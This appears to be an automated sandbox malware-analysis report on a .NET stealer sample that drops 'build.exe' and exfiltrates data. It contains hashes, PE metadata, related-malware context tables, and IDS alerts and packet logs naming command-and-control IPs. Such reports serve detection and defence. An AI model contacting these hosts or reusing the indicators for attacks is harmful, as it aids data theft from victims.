EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 65% Number of executed functions: 29 Number of non-executed functions: 6
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target file.exe, PID 7088 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
03:11:04	API Interceptor	2229280x Sleep call for process: build.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	Comprobante de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	O3o5Xzk5Wd.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	bLaLoo4ET5.exe	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	sipari_.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Transferencia.doc	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	SecuriteInfo.com.FileRepMalware.22561.28030.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse	ip-api.com/json
	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm	Browse	ip-api.com/line/?fields=hosting
	SecuriteInfo.com.Win64.Malware-gen.13500.20938.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse	ip-api.com/json
	SecuriteInfo.com.Python.Muldrop.16.26792.13248.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/line/?fields=hosting
	SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/line/?fields=hosting

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	Comprobante de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	O3o5Xzk5Wd.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	bLaLoo4ET5.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	sipari_.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Transferencia.doc	Get hash	malicious	Quasar	Browse	208.95.112.1
	https://link.edgepilot.com/s/b064b0de/7_W48d8I8kGlXhrfD-hDUg?u=https://delivmodas.ks.infinitoag.com/	Get hash	malicious	Unknown	Browse	51.195.5.58
	SecuriteInfo.com.FileRepMalware.22561.28030.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse	208.95.112.1
	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm	Browse	208.95.112.1
	SecuriteInfo.com.Win64.Malware-gen.13500.20938.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse	208.95.112.1
	SecuriteInfo.com.Python.Muldrop.16.26792.13248.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
api.telegram.org	ADJUNTA.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Request For Quotation-RFQ097524.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Request For Quotation-RFQ097524_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Request For Quotation-RFQ097524.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Ndnownts.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	installer.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	installer.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ATT-INTERNET4US	LJSS65p4Kz.elf	Get hash	malicious	Unknown	Browse	13.185.186.102
	W6Z9uSRsKQ.elf	Get hash	malicious	Unknown	Browse	75.50.134.43
	wZU2edEGL3.elf	Get hash	malicious	Unknown	Browse	108.254.96.86
	SuNMTBkfPo.elf	Get hash	malicious	Unknown	Browse	172.126.55.218
	8v2IShmMos.elf	Get hash	malicious	Unknown	Browse	70.245.246.214
	B6eg13TpEH.elf	Get hash	malicious	Unknown	Browse	108.86.82.51
	vHnFyxemFf.elf	Get hash	malicious	Unknown	Browse	99.49.173.221
	v6pwbOEUpl.elf	Get hash	malicious	Unknown	Browse	108.84.118.225
	j3Lr4Fk7Kb.elf	Get hash	malicious	Mirai	Browse	74.173.111.171
	belks.arm7.elf	Get hash	malicious	Mirai	Browse	76.192.178.208
TELEGRAMRU	ADJUNTA.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Request For Quotation-RFQ097524.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Request For Quotation-RFQ097524_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Request For Quotation-RFQ097524.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Ndnownts.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	installer.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	installer.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
AS40676US	8v2IShmMos.elf	Get hash	malicious	Unknown	Browse	172.106.233.206
	http://bigfoot99.com	Get hash	malicious	Unknown	Browse	45.61.136.67
	nklm68k.elf	Get hash	malicious	Unknown	Browse	23.133.14.68
	jklx86.elf	Get hash	malicious	Unknown	Browse	103.78.120.42
	kkkmips.elf	Get hash	malicious	Unknown	Browse	162.73.172.180
	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	107.169.77.138
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	199.119.203.211
	la.bot.sparc.elf	Get hash	malicious	Unknown	Browse	104.149.164.41
	la.bot.sparc.elf	Get hash	malicious	Unknown	Browse	205.161.47.115
	botnet.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	45.35.129.164
TUT-ASUS	Comprobante de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	O3o5Xzk5Wd.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	bLaLoo4ET5.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	sipari_.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Transferencia.doc	Get hash	malicious	Quasar	Browse	208.95.112.1
	SecuriteInfo.com.FileRepMalware.22561.28030.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse	208.95.112.1
	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm	Browse	208.95.112.1
	SecuriteInfo.com.Win64.Malware-gen.13500.20938.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse	208.95.112.1
	SecuriteInfo.com.Python.Muldrop.16.26792.13248.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Reff_Yazaki-europe_575810710108_ZnjKTIejsM.html	Get hash	malicious	Unknown	Browse	149.154.167.220
	ADJUNTA.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	File07098.PDF.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Payment Slip_SJJ023639#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Quality stuff.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Request For Quotation-RFQ097524.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Request For Quotation-RFQ097524_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Request For Quotation-RFQ097524.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	3231167_00-AG00_NL_PDF.vbs	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\AppData\Local\Temp\build.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log

Process:	C:\Users\user\AppData\Local\Temp\build.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1498
Entropy (8bit):	5.364175471524945
Encrypted:	false
SSDEEP:	24:ML9E4KQEAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoC1qE4GIs0E4K6sXE4Npv:MxHKQEAHKKkKYHKGSI6oPtHTHK1qHGI8
MD5:	1B713A2FD810C1C9A8F6F6BE36F406B1
SHA1:	0828576CB8B83C21F36AD29E327D845AB3574EBB
SHA-256:	E51E809582894F4D484939BE3990DFC914E43F4AF72AE55A00B01FCFE348763B
SHA-512:	D32200B7FA9D0DFEF4011D98D40260838A522E63C874FBCCE00D331D663169DBE1C613AD0E81C76F69A8CE6C7265605175CA75BA2C8BDA7748290B34579E148B
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Process:	C:\Users\user\Desktop\file.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Temp\build.exe

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	228440
Entropy (8bit):	5.67134193263295
Encrypted:	false
SSDEEP:	3072:eNIgoEYdtOunUSqrkGA9bvFTLUKdDuQOdEu05hkOxAWP0w:emgoEMNAkGA9bvBLNOdE27Dw
MD5:	ECC94919C7D1385D489961B21AF97328
SHA1:	82F01AAC4FDEB34EC23900D73B64BEB01EA5A843
SHA-256:	F47224FC9BD939839623AC7EB8F86D735D0DCD8BA7B2C256125850EFD6401059
SHA-512:	87213DFDD9901788DE45572630D766739C3FA262624F3C891620D0624B1D32D908F529859AE106ED1E0B7D203C0A986DB1198E226C2CF0E6070837D40EC13190
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............."...0..Z...........y... ........@.. ....................................`.................................dy..W.......D............4..XH...`....................................................... ............... ..H............text....Y... ...Z.................. ..`.rsrc...D............\..............@..@.reloc.......`.......2..............@..B.................y......H.......<...(......._...................................................PK..........................................5...P...n...w...{...................................................................\|.......................8...K.......................[......."...#...&...'...........=.......F.......8...............2...p...s...a............ ...#...'...+...c...i...i...i...i..PK......PK......PK......PK..".(,....n......~'........~'........Jr1..p..(^........*r.(,.......}J.......

\Device\Null

Process:	C:\Windows\System32\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.41440934524794
Encrypted:	false
SSDEEP:	3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
MD5:	3DD7DD37C304E70A7316FE43B69F421F
SHA1:	A3754CFC33E9CA729444A95E95BCB53384CB51E4
SHA-256:	4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
SHA-512:	713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
Malicious:	false
Preview:	..Waiting for 3 seconds, press a key to continue ....2.1.0..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.426492166688313
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	file.exe
File size:	315'904 bytes
MD5:	d5b8ac0d80c99e7dda0d9df17c159f3d
SHA1:	ae1e0aeb3fbba55999b74047ee2b8bb4e45f108a
SHA256:	c330322b774eb263b008178ff707e13b843fd7df62445cca3c52356509c26f78
SHA512:	2637cc05aa402832dadbf48431f1add417b69a8351de2a5edae80283da7a6924166ea56bc85865dfa993d88f467d8f540528627e5cbe64cc67ec8d5a3d6655bc
SSDEEP:	6144:+MW2MDA5DDzwLLoMC9YsbxE0UyRtXpJldoopDIrhi7m:EREZELLoMeYkxEgJzTp
TLSH:	E564D053EB98E4D5E90434396AA14568D335FD759838E603118CF2EFF6BBFC0418A68B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F.!g............................).... ... ....@.. .......................@............@................................

File Icon


Icon Hash:	0c0c2d33ceec80aa

Static PE Info

General

Entrypoint:	0x440929
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6721B146 [Wed Oct 30 04:08:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x408df	0x4a	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x42000	0xe2f1	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x52000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x3e92f	0x3ea00	2bdbe9f6c652fc19d48b5cc1242a4e20	False	0.826047124500998	data	7.926984592050979	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x42000	0xe2f1	0xe400	5f49f94e89367157a32ad3441ce31ada	False	0.16274328399122806	data	3.369873442460133	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x52000	0xc	0x200	52e40c31d7518491c819d662123eac07	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x420cc	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2048	English	United States	0.1174924924924925
RT_ICON	0x42b58	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.15792682926829268
RT_ICON	0x431e4	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.23387096774193547
RT_ICON	0x434f0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.39864864864864863
RT_ICON	0x4363c	0x1628	Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors	English	United States	0.08339210155148095
RT_ICON	0x44c88	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.1023454157782516
RT_ICON	0x45b54	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.10649819494584838
RT_ICON	0x46420	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.10838150289017341
RT_ICON	0x469ac	0x12e5	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.8712011577424024
RT_ICON	0x47cb5	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.05668398677373642
RT_ICON	0x4bf01	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.08475103734439834
RT_ICON	0x4e4cd	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.09920262664165103
RT_ICON	0x4f599	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.2047872340425532
RT_GROUP_ICON	0x4fa4f	0xbc	data	English	United States	0.6170212765957447
RT_VERSION	0x4fb47	0x584	data	English	United States	0.29957507082152973
RT_MANIFEST	0x50107	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	English	United States	0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-30T08:11:05.295031+0100	2050601	ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request	1	192.168.2.7	49700	41.216.183.9	8080	TCP
2024-10-30T08:11:05.347436+0100	2050602	ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration	1	192.168.2.7	49700	41.216.183.9	8080	TCP
2024-10-30T08:12:44.915269+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.7	63169	209.38.221.184	8080	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 30, 2024 08:11:03.854688883 CET	49699	80	192.168.2.7	208.95.112.1
Oct 30, 2024 08:11:03.860146046 CET	80	49699	208.95.112.1	192.168.2.7
Oct 30, 2024 08:11:03.860213995 CET	49699	80	192.168.2.7	208.95.112.1
Oct 30, 2024 08:11:03.861440897 CET	49699	80	192.168.2.7	208.95.112.1
Oct 30, 2024 08:11:03.866977930 CET	80	49699	208.95.112.1	192.168.2.7
Oct 30, 2024 08:11:04.458051920 CET	80	49699	208.95.112.1	192.168.2.7
Oct 30, 2024 08:11:04.512614965 CET	49699	80	192.168.2.7	208.95.112.1
Oct 30, 2024 08:11:04.934124947 CET	49700	8080	192.168.2.7	41.216.183.9
Oct 30, 2024 08:11:04.939764977 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:04.939866066 CET	49700	8080	192.168.2.7	41.216.183.9
Oct 30, 2024 08:11:04.940112114 CET	49700	8080	192.168.2.7	41.216.183.9
Oct 30, 2024 08:11:04.945460081 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.295031071 CET	49700	8080	192.168.2.7	41.216.183.9
Oct 30, 2024 08:11:05.301258087 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.301273108 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.301291943 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.301301003 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.301331043 CET	49700	8080	192.168.2.7	41.216.183.9
Oct 30, 2024 08:11:05.301357985 CET	49700	8080	192.168.2.7	41.216.183.9
Oct 30, 2024 08:11:05.301384926 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.301394939 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.301403999 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.301443100 CET	49700	8080	192.168.2.7	41.216.183.9
Oct 30, 2024 08:11:05.301467896 CET	49700	8080	192.168.2.7	41.216.183.9
Oct 30, 2024 08:11:05.302371979 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.302398920 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.302424908 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.302453995 CET	49700	8080	192.168.2.7	41.216.183.9
Oct 30, 2024 08:11:05.302476883 CET	49700	8080	192.168.2.7	41.216.183.9
Oct 30, 2024 08:11:05.306847095 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.306859970 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.306879044 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.306888103 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.306909084 CET	49700	8080	192.168.2.7	41.216.183.9
Oct 30, 2024 08:11:05.306931973 CET	49700	8080	192.168.2.7	41.216.183.9
Oct 30, 2024 08:11:05.306997061 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.307005882 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.307041883 CET	49700	8080	192.168.2.7	41.216.183.9
Oct 30, 2024 08:11:05.307054043 CET	49700	8080	192.168.2.7	41.216.183.9
Oct 30, 2024 08:11:05.347309113 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.347435951 CET	49700	8080	192.168.2.7	41.216.183.9
Oct 30, 2024 08:11:05.395334005 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.395401001 CET	49700	8080	192.168.2.7	41.216.183.9
Oct 30, 2024 08:11:05.443356991 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.443439007 CET	49700	8080	192.168.2.7	41.216.183.9
Oct 30, 2024 08:11:05.491450071 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.491522074 CET	49700	8080	192.168.2.7	41.216.183.9
Oct 30, 2024 08:11:05.539515018 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.539592028 CET	49700	8080	192.168.2.7	41.216.183.9
Oct 30, 2024 08:11:05.545324087 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.545434952 CET	49700	8080	192.168.2.7	41.216.183.9
Oct 30, 2024 08:11:05.550864935 CET	8080	49700	41.216.183.9	192.168.2.7
